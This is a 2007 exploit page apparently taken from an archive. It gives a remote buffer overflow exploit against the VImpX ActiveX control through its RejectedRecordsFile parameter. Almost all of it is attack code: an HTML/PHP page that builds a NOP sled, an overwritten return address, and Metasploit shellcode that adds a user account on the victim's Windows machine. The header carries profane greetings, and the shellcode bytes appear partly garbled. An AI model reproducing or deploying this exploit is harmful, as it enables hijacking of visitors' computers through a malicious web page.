Home / os / win10

vimpx-overflow.txt

Posted on 16 October 2007

> <!-
>    **************************************
>    | VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote
> Buffer Overflows Exploit (RejectedRecordsFile)
>    | Code by 'Saw13'
>    | Software Site:
> http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53
>    | Special Fuck to : Delta Hacking Security
> Team--Farzad Sharifi- All Lashiayne Fucking MemberZ
Special TANX :  CrazyAngel  -   snake
>    ***************************************
> ->
> <html>
> <object
> classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968'
> id='VImpAX1'>
> <?php
> /* win32_adduser -  PASS=tzu EXITFUNC=seh USER=sun
> Size=483 Encoder=PexAlphaNum http://metasploit.com */
> $shellcode =
> "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
> "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
> "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
> "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
> "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
> "x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex57".
> "x45x50x4ax37x41x50x4fx4ex4bx48x4fx44x4ax51x4bx48".
> "x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x43x4bx38".
> "x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c".
> "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
> "x46x4fx4bx33x46x35x46x42x46x50x45x47x45x4ex4bx58".
> "x4fx35x46x32x41x30x4bx4ex48x56x4bx48x4ex50x4bx54".
> "x4bx38x4fx35x4ex41x41x50x4bx4ex4bx38x4ex51x4bx38".
> "x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx 41x43".
> "x42x4cx46x46x4bx58x42x44x42x33x45x48x42x4cx4ax57".
> "x4ex50x4bx38x42x54x4ex30x4bx38x42x37x4ex41x4dx4a".
> "x4bx58x4ax36x4ax30x4bx4ex49x50x4bx58x42x38x42x4b".
> "x42x50x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x53".
> "x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx47".
> "x42x45x4ax36x42x4fx4cx58x46x30x4fx45x4ax46x4ax49".
> "x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x36x4dx56".
> "x46x36x50x32x45x46x4ax47x45x56x42x52x4fx52x43x36".
> "x42x52x50x46x45x56x46x47x42x52x45x47x43x37x45x56".
> "x44x57x42x42x43x57x45x47x50x56x42x52x46x47x4cx37".
> "x45x47x42x52x4fx42x41x34x46x34x46x54x42x42x48x42".
> "x48x32x42x52x50x46x45x36x46x57x42x52x4ex46x4fx36".
> "x43x56x41x46x4ex36x47x56x44x47x4fx36x45x57x42x37".
> "x42x52x41x54x46x46x4dx56x49x46x50x56x49 x36x43x37".
> "x46x47x44x37x41x56x46x47x4fx56x44x37x43x37x42x52".
> "x43x57x45x57x50x46x42x42x4fx32x41x34x46x54x46x54".
> "x42x50x5a";
> $junk = "x45x45x45x59";
> $eip  = "x2dxd1xe0x77"; // call eax user32.dll
> $exploit=
>
str_repeat("x90",268).$eip.$junk."x90x90x90x0dx01".str_repeat("x90",16).$shellcode.str_repeat("x90",9999);
> echo "<param name="RejectedRecordsFile"
> value="$exploit"/>";
> ?>
> </object>
> </html>

 

TOP